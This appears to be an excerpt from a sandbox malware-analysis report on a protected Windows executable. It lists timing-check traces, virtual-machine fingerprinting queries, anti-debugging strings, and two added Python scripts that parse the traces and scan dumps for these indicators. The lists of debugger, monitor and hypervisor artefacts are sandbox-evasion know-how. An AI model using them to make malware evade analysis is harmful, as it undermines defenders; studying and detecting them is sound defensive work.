    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC096 second address: BDC09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC09C second address: BDC0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0A0 second address: BDC0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146845h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0BB second address: BDC0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDC0C1 second address: BDC10E instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FB4CD146865h 0x00000010 jmp 00007FB4CD146847h 0x00000015 jmp 00007FB4CD146848h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB4CD14683Ah 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDBCAA second address: BDBCC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BDBE3C second address: BDBE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEA54B second address: BEA555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4CD3D7AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE3FF second address: BEE429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146849h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007FB4CD146836h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE429 second address: BEE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BEE42D second address: BEE431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BFD4ED second address: BFD520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AB8h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007FB4CD3D7AB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BFD520 second address: BFD526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BFD3C6 second address: BFD3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0705E second address: C07062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C07062 second address: C0707D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4CD3D7AB3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C059E4 second address: C05A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FB4CD146847h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C05F88 second address: C05FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD3D7AB3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C05FA1 second address: C05FAB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C06276 second address: C0628B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB4CD3D7AADh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0628B second address: C0628F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0628F second address: C06299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C06299 second address: C062A3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A9A9 second address: C0A9AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A9AD second address: C0A9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4CD146849h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A9CC second address: C0A9DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD3D7AADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A578 second address: C0A584 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A6F3 second address: C0A6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4CD3D7AA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A6FE second address: C0A70F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB4CD14683Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0A70F second address: C0A71C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C178B3 second address: C178B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C178B7 second address: C178BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C178BB second address: C178C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14C71 second address: C14CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB4CD3D7AB2h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FB4CD3D7AAAh 0x00000014 jp 00007FB4CD3D7AB2h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C14CAF second address: C14CB9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C26E44 second address: C26E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FB4CD3D7AA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C29AD6 second address: C29AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007FB4CD14683Ah 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C296A0 second address: C296A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C29813 second address: C2981F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FB4CD146836h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3E6BC second address: C3E6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3E6C9 second address: C3E6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3E6CD second address: C3E6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FB4CD3D7AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3E841 second address: C3E877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4CD146843h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jg 00007FB4CD146836h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3E877 second address: C3E87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3EA23 second address: C3EA37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FB4CD146836h 0x00000009 jp 00007FB4CD146836h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3EA37 second address: C3EA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3EBBC second address: C3EBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F03A second address: C3F040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F040 second address: C3F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F16A second address: C3F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4CD3D7AB5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F2CF second address: C3F2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40EA1 second address: C40EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C43C43 second address: C43C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD146841h 0x00000008 jnl 00007FB4CD146836h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 or edx, dword ptr [ebp+122D3891h] 0x0000001a push 00000004h 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D30ECh], esi 0x00000023 sbb di, 294Dh 0x00000028 popad 0x00000029 push BC0C3B9Dh 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C43E8A second address: C43E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C43E97 second address: C43EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jo 00007FB4CD146838h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 nop 0x00000011 sub dx, 4B68h 0x00000016 movsx edx, di 0x00000019 push dword ptr [ebp+122D1DA6h] 0x0000001f or dh, 0000000Bh 0x00000022 jmp 00007FB4CD146846h 0x00000027 push 5584F5D3h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB4CD146848h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C43EEE second address: C43EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C48B50 second address: C48B7B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4CD146836h 0x00000008 ja 00007FB4CD146836h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB4CD146846h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C48B7B second address: C48B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C48B84 second address: C48B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
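Each interceptor row above records, for one pair of consecutive rdtsc reads, the instructions the sample executed between them. Almost every row is stack shuffling (push/pop of a register, pushad/popad, short jumps) with the two timestamp reads woven in, which is the look of a commercial protector rather than hand-written code; only a few rows (C43C43 and C43E97 above) carry instructions that do real work. The following Python script is an added example, not part of the Joe Sandbox report or of the sample, that parses rows in this format, separates filler from working instructions, sums the net stack effect of each window, and checks whether a jump was taken between the two reads by comparing the trace offset of the second rdtsc with the address distance. Four rows copied from the report are embedded as constructed input; the filler classification and the "linear" heuristic are the example's own assumptions, not something the report states.

```python
import re
from dataclasses import dataclass

# Constructed sample: four "RDTSC instruction interceptor" rows copied from the
# report. Two are pure stack-shuffling filler, two contain working instructions.
SAMPLE_ROWS = [
    "First address: BDBE3C second address: BDBE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "First address: BEA54B second address: BEA555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4CD3D7AA6h 0x0000000a rdtsc",
    "First address: C43C43 second address: C43C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD146841h 0x00000008 jnl 00007FB4CD146836h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 or edx, dword ptr [ebp+122D3891h] 0x0000001a push 00000004h 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D30ECh], esi 0x00000023 sbb di, 294Dh 0x00000028 popad 0x00000029 push BC0C3B9Dh 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc",
    "First address: C43E97 second address: C43EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jo 00007FB4CD146838h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 nop 0x00000011 sub dx, 4B68h 0x00000016 movsx edx, di 0x00000019 push dword ptr [ebp+122D1DA6h] 0x0000001f or dh, 0000000Bh 0x00000022 jmp 00007FB4CD146846h 0x00000027 push 5584F5D3h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB4CD146848h 0x00000033 rdtsc",
]

ROW_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.+)$")
# one "0xOFFSET mnemonic operands" item; the lookahead stops at the next offset
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|$)")
REGS32 = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}
STACK_EFFECT = {"pushad": 8, "popad": -8, "push": 1, "pop": -1}   # in dwords


@dataclass
class Window:
    first: int
    second: int
    trace: list        # (trace offset, mnemonic, operands) in executed order
    stack_delta: int   # net dwords pushed between the two reads
    real_ops: list     # mnemonics that are not stack or branch filler

    @property
    def linear(self) -> bool:
        # Offsets are byte offsets along the executed trace. If the second rdtsc
        # sits exactly (second - first) bytes in, no jump was taken in between
        # (assumption of this example; a taken jmp makes the two differ).
        return self.trace[-1][0] == self.second - self.first


def parse_window(row: str) -> Window:
    m = ROW_RE.search(row)
    if not m:
        raise ValueError("not an RDTSC interceptor row: %r" % row)
    first, second = int(m.group(1), 16), int(m.group(2), 16)
    trace, delta, real = [], 0, []
    for off, text in INSN_RE.findall(m.group(3)):
        mn, _, ops = text.partition(" ")
        trace.append((int(off, 16), mn, ops))
        delta += STACK_EFFECT.get(mn, 0)
        # filler: the reads themselves, whole-register saves, nops, any branch,
        # and push/pop of a plain register (push of an immediate or memory
        # operand is an argument for real code and counts as work)
        filler = (mn in ("rdtsc", "pushad", "popad", "nop")
                  or mn.startswith("j")
                  or (mn in ("push", "pop") and ops in REGS32))
        if not filler:
            real.append(mn)
    if sum(1 for _, mn, _ in trace if mn == "rdtsc") != 2:
        raise ValueError("window does not contain exactly two rdtsc reads")
    return Window(first, second, trace, delta, real)


def summarize(rows) -> dict:
    """Aggregate over all rows: how many windows do real work and how many
    took a jump between the two reads, plus the address range they cover."""
    wins = [parse_window(r) for r in rows]
    return {
        "windows": len(wins),
        "with_real_ops": sum(1 for w in wins if w.real_ops),
        "nonlinear": sum(1 for w in wins if not w.linear),
        "address_span": (min(w.first for w in wins), max(w.second for w in wins)),
    }


if __name__ == "__main__":
    for w in map(parse_window, SAMPLE_ROWS):
        print(f"{w.first:06X}->{w.second:06X} linear={w.linear} stack={w.stack_delta:+d} real={w.real_ops}")
    print(summarize(SAMPLE_ROWS))
```

Run against the whole interceptor list (paste the rows into SAMPLE_ROWS or read them from a file), the summary tells you how many of the 53 timing windows contain anything other than the timestamp save/restore and protector filler, which is what you need to decide whether the rdtsc checks are the protector's own VM detection or part of the payload.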
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9AC9B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9AA42A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B65498 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9AC90A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 6752 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6772 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1732013708.0000000001249000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1734132839.0000000001249000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000002.1734132839.000000000127A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732013708.000000000127A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1733501177.0000000000B33000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

    Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098DF70 LdrInitializeThunk, 0_2_0098DF70
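The rows above are the literal strings the sample hands to the window-enumeration, file-open and registry APIs to spot debuggers (OllyDbg, the SoftICE NTICE/SICE/SIWVID devices), Sysinternals monitors (Process Monitor, Filemon, Regmon window classes and titles) and a VirtualBox guest (the VBOX__ ACPI table path, BIOS version values), next to the Oreans.vxd and WinLicense strings of the protector that wraps the sample. The following Python scanner is an added example, not report tooling or sample code, that looks for those same indicators in an arbitrary memory dump or unpacked image. It searches both ASCII and UTF-16LE, because the wide-string API variants store their arguments as UTF-16, compares case-insensitively since FindWindow does, and applies a boundary check so that short device names such as SICE are not matched inside longer words. The indicator lists are copied from this report; the grouping into categories and the sample blob are constructed for the example.

```python
# Indicator strings taken from the anti-debugging and sandbox-evasion rows of
# the report, grouped by the API the sample feeds them to (grouping is the
# example's own, not the report's).
INDICATORS = {
    # FindWindow class names and titles of debuggers and Sysinternals monitors
    "window_name": [
        "regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
        "process monitor - sysinternals: www.sysinternals.com",
        "registry monitor - sysinternals: www.sysinternals.com",
        "file monitor - sysinternals: www.sysinternals.com",
    ],
    # CreateFile on the SoftICE / NuMega driver device names
    "kernel_debugger_device": ["NTICE", "SICE", "SIWVID"],
    # registry keys and values used to fingerprint a hypervisor
    "vm_registry": ["HARDWARE\\ACPI\\DSDT\\VBOX__", "SystemBiosVersion",
                    "VideoBiosVersion", "DriverDesc"],
    # strings left behind by the Oreans (Themida/WinLicense) protector
    "protector": ["Oreans.vxd", "Software\\WinLicense", "XprotEvent"],
}


def _bounded(data: bytes, start: int, end: int) -> bool:
    """True if the match is not embedded in a longer alphanumeric run, so that
    'SICE' inside 'SICEBOX' or 'NTICE' inside 'NOTICEABLE' is rejected."""
    return not (data[start - 1:start].isalnum() or data[end:end + 1].isalnum())


def scan(blob: bytes) -> dict:
    """Return {category: [(indicator, encoding, offset), ...]} for every
    indicator found as ASCII or UTF-16LE, matched case-insensitively."""
    low = blob.lower()                      # bytes.lower() touches ASCII letters only
    hits = {}
    for category, names in INDICATORS.items():
        for name in names:
            for enc in ("ascii", "utf-16-le"):
                needle = name.encode(enc).lower()
                pos = low.find(needle)
                while pos != -1:
                    if _bounded(low, pos, pos + len(needle)):
                        hits.setdefault(category, []).append((name, enc, pos))
                    pos = low.find(needle, pos + 1)
    return hits


def triage(blob: bytes) -> dict:
    """Compact verdict: which categories are present and how many hits."""
    hits = scan(blob)
    return {"categories": sorted(hits),
            "indicator_count": sum(len(v) for v in hits.values())}


# Constructed test blob: a few of the indicators between padding bytes, some as
# ASCII and some as UTF-16LE, the way they sit in an unpacked image.
SAMPLE_BLOB = (
    b"\x00" * 16
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + "OllyDbg".encode("utf-16-le") + b"\x00\x00"
    + b"\\\\.\\NTICE\x00"
    + "procmon_window_class".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
    + b"%s\\Oreans.vxd\x00"
)

if __name__ == "__main__":
    for category, found in scan(SAMPLE_BLOB).items():
        for name, enc, off in found:
            print(f"{category:24s} {off:#08x} {enc:9s} {name}")
    print(triage(SAMPLE_BLOB))
```

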